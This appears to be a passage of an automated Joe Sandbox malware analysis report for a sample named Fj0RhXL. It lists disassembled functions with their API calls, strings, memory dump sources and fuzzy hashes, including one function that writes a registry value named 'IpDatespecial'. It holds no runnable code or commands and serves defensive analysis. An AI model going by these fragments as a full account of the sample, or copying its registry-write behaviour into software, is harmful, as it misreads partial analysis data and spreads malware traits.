Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Check$Button$ItemMenu$CheckedDialog
String ID:
API String ID: 1766801748-0
Opcode ID: 3a8422474808cb906431cf87109ee3842c4f7c01dd8790165c3d6fcff12e51d7
Instruction ID: 6addae581913f64b37b0641f774acd76320a74500eb3ffa912d82088422e908d
Opcode Fuzzy Hash: 3a8422474808cb906431cf87109ee3842c4f7c01dd8790165c3d6fcff12e51d7
Instruction Fuzzy Hash: 6631133264425CAFDB15AFA9CC48A663B78FB0674CF20052AFA51CA941C3B68477DFD0

Function 6C37B828 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6C37B842
_sprintf.LIBCMT ref: 6C37B8C0
_fseek.LIBCMT ref: 6C37B8FF

Strings

%s%s%d, xrefs: 6C37B8BA
CPJV_, xrefs: 6C37B8B2
(/@l, xrefs: 6C37B89B

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __floor_pentium4_fseek_sprintf
String ID: %s%s%d$(/@l$CPJV_
API String ID: 2752894067-1028805631
Opcode ID: 20772facda88c00762fb24f7c41dac37de35e4a11f1249fcc2e6d062a18cc67e
Instruction ID: 68df006f1274b76f10319aae03daa5e8274ed31554d1d8ae74056d081d5794de
Opcode Fuzzy Hash: 20772facda88c00762fb24f7c41dac37de35e4a11f1249fcc2e6d062a18cc67e
Instruction Fuzzy Hash: 73214E72B1224566DB18DB798C05E9A77BD9B82368F10023AE454DF6C0EF34D8448F69

Function 03D8A1B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8A1C3

Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F

std::_Xinvalid_argument.LIBCPMT ref: 03D8A1D7
std::_Xinvalid_argument.LIBCPMT ref: 03D8A1E9
_memmove.LIBCMT ref: 03D8A24B

Strings

invalid string position, xrefs: 03D8A1BE
string too long, xrefs: 03D8A1D2, 03D8A1E4

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: b84a10c91a00a9990941f5ab2a8af724b7aba9af4db6d601a114def57a22e19c
Instruction ID: 3df26ebb278c38274b3f44c4f2a6e346676501b69fd03dcf0d9ef92bf70e0578
Opcode Fuzzy Hash: b84a10c91a00a9990941f5ab2a8af724b7aba9af4db6d601a114def57a22e19c
Instruction Fuzzy Hash: 6621FB717002019FD724FF6C98D0B69B7AEEF91624B14021BE1128F691C762FD64C3B0

Function 03D99250 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D9925D
CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D99277
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D99292
lstrlenW.KERNEL32(?,00000000,00000000), ref: 03D9929F
WriteFile.KERNEL32(00000000,?,00000000), ref: 03D992AA
CloseHandle.KERNEL32(00000000), ref: 03D992B1
ReleaseMutex.KERNEL32(?), ref: 03D992BE

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
String ID:
API String ID: 4202892810-0
Opcode ID: 5b6af593cd5bc4999d34cca3b9a157e4c6e5dbf786b94da08e2a102e2057f7fb
Instruction ID: b886e52ee2c087df35bd9220c99c7c4bd5c1bfc94b0993ca0db2fab6e300f4a2
Opcode Fuzzy Hash: 5b6af593cd5bc4999d34cca3b9a157e4c6e5dbf786b94da08e2a102e2057f7fb
Instruction Fuzzy Hash: 2701A473250214FBE320BBA4AC0EF9B366CDB09B25F104704F715E63C4E7B459048765

Function 03DA2918 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,03DB7760,00000008,03DA2A20,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C), ref: 03DA2929
__lock.LIBCMT ref: 03DA295D

Part of subcall function 03DA8DA3: __mtinitlocknum.LIBCMT ref: 03DA8DB9
Part of subcall function 03DA8DA3: __amsg_exit.LIBCMT ref: 03DA8DC5
Part of subcall function 03DA8DA3: EnterCriticalSection.KERNEL32(00000000,00000000,?,03DA2AF0,0000000D,03DB7788,00000008,03DA2BE7,00000000,?,03D9C743,00000000,03DB7688,00000008,03D9C7A8,?), ref: 03DA8DCD

InterlockedIncrement.KERNEL32(?), ref: 03DA296A
__lock.LIBCMT ref: 03DA297E
___addlocaleref.LIBCMT ref: 03DA299C

Strings

KERNEL32.DLL, xrefs: 03DA2924

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: c5e5525870b821f2807bd96a585a9b413c2f64330a23fa0825d2a657ad4fee64
Instruction ID: 98434e1fc3f6d6571336995e6b71e07e7c60df7dfd244b581344ab01027618f5
Opcode Fuzzy Hash: c5e5525870b821f2807bd96a585a9b413c2f64330a23fa0825d2a657ad4fee64
Instruction Fuzzy Hash: 8E018BB6444B00DFD720EF6AD90474AFBE0FF54320F204D0AD4AA9A7A0CBB0A644DB24

Function 02F098B1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,02F17B80,00000008,02F099B9,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C), ref: 02F098C2
__lock.LIBCMT ref: 02F098F6

Part of subcall function 02F0C255: __mtinitlocknum.LIBCMT ref: 02F0C26B
Part of subcall function 02F0C255: __amsg_exit.LIBCMT ref: 02F0C277
Part of subcall function 02F0C255: EnterCriticalSection.KERNEL32(00000000,00000000,?,02F09A89,0000000D,02F17BA8,00000008,02F09B80,00000000,?,02F07821,00000000,02F17AE0,00000008,02F07886,?), ref: 02F0C27F

InterlockedIncrement.KERNEL32(?), ref: 02F09903
__lock.LIBCMT ref: 02F09917
___addlocaleref.LIBCMT ref: 02F09935

Strings

KERNEL32.DLL, xrefs: 02F098BD

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 22d62b04d19f15531b7896fe205735050717c55ba9796f714bf8df9e68b88283
Instruction ID: 159b128538dba2f053215e3d2ab146212074d312b6c6b9c70ff7faf36988f894
Opcode Fuzzy Hash: 22d62b04d19f15531b7896fe205735050717c55ba9796f714bf8df9e68b88283
Instruction Fuzzy Hash: 8B01C471840700DFE7209FA5D98434AFBF1AF807A0F90890ED6DA562D0CBF0A644DF51

Function 03D96463 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03D9647E
RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03D9648E
RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 03D964A5
RegCloseKey.ADVAPI32(?,?,00000004), ref: 03D964B0

Strings

Console, xrefs: 03D96474
IpDatespecial, xrefs: 03D96488, 03D9649F

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Value$CloseDeleteOpen
String ID: Console$IpDatespecial
API String ID: 3183427449-1840232981
Opcode ID: 3b1b111a44fe8a6fdb29f6c77320c191e2944a5e0706600111b638a0e75b462e
Instruction ID: b20cbf98216fb875bd6915efe879a17402e7e6ffd32308b09ce8db219366de70
Opcode Fuzzy Hash: 3b1b111a44fe8a6fdb29f6c77320c191e2944a5e0706600111b638a0e75b462e
Instruction Fuzzy Hash: CEF08273244340EBD3209760AC4BF5AB764F788701F14490DBA4565285D660E224C765

Function 03DA6C4B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03DA6C6C

Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55

__getptd.LIBCMT ref: 03DA6C7D
__getptd.LIBCMT ref: 03DA6C8B

Strings

csm, xrefs: 03DA6C65
RCC, xrefs: 03DA6C57
MOC, xrefs: 03DA6C5E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 856c58d99f932a3febb97830a2d2da109b140a3f6b64071b2c9b01318b2a212b
Instruction ID: 0a7349bddfca40de5a15237c79de0a16efd34f0aff72f5c56882c61d9ab2c8db
Opcode Fuzzy Hash: 856c58d99f932a3febb97830a2d2da109b140a3f6b64071b2c9b01318b2a212b
Instruction Fuzzy Hash: D3E01A39100A04CFE730EB6DC349B683BA5FB88A14F1D45A1E49CCB266C738E4508952

Function 02F13501 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02F13522

Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE

__getptd.LIBCMT ref: 02F13533
__getptd.LIBCMT ref: 02F13541

Strings

MOC, xrefs: 02F13514
csm, xrefs: 02F1351B
RCC, xrefs: 02F1350D

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: f2a1e7849386d99612e5de526001b84564951c592f4ee1d89a7d1fe248cdfa0a
Instruction ID: 8254ccaccdf82adb8a6669aab0d411c3af1bfb0e93c3b3704a3eb0677d822449
Opcode Fuzzy Hash: f2a1e7849386d99612e5de526001b84564951c592f4ee1d89a7d1fe248cdfa0a
Instruction Fuzzy Hash: 28E048719151048FCB149BA4C4D976833D5FF84B94F5610E2D60DCB363E774D4509F52

Function 6C3B7D4C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 365COMMON

Download Yara Rule

APIs

Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDBEA
Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDBFA
Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDC5F
Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDCA5

_sprintf.LIBCMT ref: 6C3B7FE7
_sprintf.LIBCMT ref: 6C3B816E

Part of subcall function 6C3B9525: _sprintf.LIBCMT ref: 6C3B9576

Strings

(No time or space), xrefs: 6C3B7FCB
(Composite), xrefs: 6C3B7FDB
%s%s%.3s %s %s (%cT Zone %s) %s%s%s, xrefs: 6C3B8168

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fprintf$_sprintf
String ID: %s%s%.3s %s %s (%cT Zone %s) %s%s%s$(Composite)$(No time or space)
API String ID: 364784897-2407286440
Opcode ID: b368fc730cb26049be964e21f6db65aac1d9c88c541c21f3d7575f7955336e9c
Instruction ID: 2b1bb9f13ca24f41cbb34456f8b96e3f579f9071be744809d7ce2dbe6a38f385
Opcode Fuzzy Hash: b368fc730cb26049be964e21f6db65aac1d9c88c541c21f3d7575f7955336e9c
Instruction Fuzzy Hash: 46C1F971B09502DBDF14FB698C81AA93374EB6731CB24465BD194E6E81DB328884CFB7

Function 6C37BDB1 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6C37BE02
__floor_pentium4.LIBCMT ref: 6C37BE16
__floor_pentium4.LIBCMT ref: 6C37BE57
__floor_pentium4.LIBCMT ref: 6C37BE6B
__floor_pentium4.LIBCMT ref: 6C37BEB5
__floor_pentium4.LIBCMT ref: 6C37BEDC

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 6b28c2e3a93db695878e0b39c1f587863dad8529fe1bf3755ccfcb69c222d12c
Instruction ID: 25afcedc78c885b0c56e5a04f0e92ed4a9556b4fd5b8eb31fa79d7fa9cff0249
Opcode Fuzzy Hash: 6b28c2e3a93db695878e0b39c1f587863dad8529fe1bf3755ccfcb69c222d12c
Instruction Fuzzy Hash: 0E418B71904D0EE2DF147FA2F5092EEBF34FB86395F920989D5D420494CF3A40B8878A

Function 03D948F0 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D948FF

Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83

_free.LIBCMT ref: 03D94923
_memset.LIBCMT ref: 03D9497B

Part of subcall function 03D952D0: GetObjectW.GDI32(?,00000054,?), ref: 03D952EE

CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03D94993
_free.LIBCMT ref: 03D949A4
_free.LIBCMT ref: 03D949E3

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
String ID:
API String ID: 1756752955-0
Opcode ID: b08078b7d1c24388bba5920ba6e89f4f267ac68b02c69f1249a773b0989632e5
Instruction ID: 419f8d8db95689a455f16673014f7aeb2485b1cd9eb015234db726274114e4e4
Opcode Fuzzy Hash: b08078b7d1c24388bba5920ba6e89f4f267ac68b02c69f1249a773b0989632e5
Instruction Fuzzy Hash: 4F318BF2604315ABEB10DF2AE880B56B7ECFB48704F04813BDA098A642E7B0A555C7A1

Function 03D85060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000002FF), ref: 03D850AA
WSASetLastError.WS2_32(0000139F), ref: 03D850C2
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 03D850CC

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 517a395ba765925e5f9495c8f061e55b96884a4158839d0339f7fa916ae4a7fa
Instruction ID: dfad31ad33421323111048cbb6bcbf7be53921950a09af3c2e1969267770c215
Opcode Fuzzy Hash: 517a395ba765925e5f9495c8f061e55b96884a4158839d0339f7fa916ae4a7fa
Instruction Fuzzy Hash: 4C319076A04744DBD710EF94E845B6AB3A9FB4AB10F004A5EF916C7780E736F910CB60

Function 02F05050 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000002FF), ref: 02F0509A
WSASetLastError.WS2_32(0000139F), ref: 02F050B2
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02F050BC

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 0b5e3ec6c57d9e4c2ab17092fc7d7b4b9fcb7ad5d0c5db18245591f951496771
Instruction ID: 55ed7a58c91734ff6e56e804567b08cd535cde5f88903b21df0917a8a32fabad
Opcode Fuzzy Hash: 0b5e3ec6c57d9e4c2ab17092fc7d7b4b9fcb7ad5d0c5db18245591f951496771
Instruction Fuzzy Hash: 9631AD72A44248ABE710CF94DD85F6BB7E9FB48B50F80491EFA16C7780D776A810DB90

Function 6C3AACA0 Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

APIs

DialogBoxParamA.USER32(000000CC,Function_0005A3C0,00000000), ref: 6C3AAD0E
IsDlgButtonChecked.USER32(?,000004B7), ref: 6C3AAD29
IsDlgButtonChecked.USER32(?,000004B8), ref: 6C3AAD3A
IsDlgButtonChecked.USER32(?,000004B9), ref: 6C3AAD4B
EndDialog.USER32(?,00000001), ref: 6C3AAD63
CheckRadioButton.USER32(?,000004B7,000004BA,000004B7), ref: 6C3AAD9E

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Button$Checked$Dialog$CheckParamRadio
String ID:
API String ID: 248094426-0
Opcode ID: f7007bb722896f03c12eccf63f1d5724f20e61509012befa1bd673c1eeba5b58
Instruction ID: 630749c48bed15a346f9ed9d44eb5e14b6ae7d4c813a8c4f7d4f21c9b522b6c7
Opcode Fuzzy Hash: f7007bb722896f03c12eccf63f1d5724f20e61509012befa1bd673c1eeba5b58
Instruction Fuzzy Hash: 8E214972B90106AAEB006FB8CC24E693BADD702B1AF104B26F6A1D64C4D77CC4638D60

Function 6C3C7FD6 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 305COMMON

Download Yara Rule

APIs

Part of subcall function 6C3CD1C1: _fprintf.LIBCMT ref: 6C3CD23E

Part of subcall function 6C3CDCFF: MoveToEx.GDI32(00000003,?,00000000,?), ref: 6C3CDD56
Part of subcall function 6C3CDCFF: LineTo.GDI32(00000000,?), ref: 6C3CDD68
Part of subcall function 6C3CDCFF: SetPixel.GDI32(00000000,?,?,6C3CF814), ref: 6C3CDD86

Part of subcall function 6C3CDCFF: _fprintf.LIBCMT ref: 6C3CDDE6

__floor_pentium4.LIBCMT ref: 6C3C80EE
_sprintf.LIBCMT ref: 6C3C8275
_sprintf.LIBCMT ref: 6C3C830F

Part of subcall function 6C3CE9CE: _fprintf.LIBCMT ref: 6C3CEAD0

Strings

%c%d, xrefs: 6C3C8309
%c%3d%%, xrefs: 6C3C826F

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
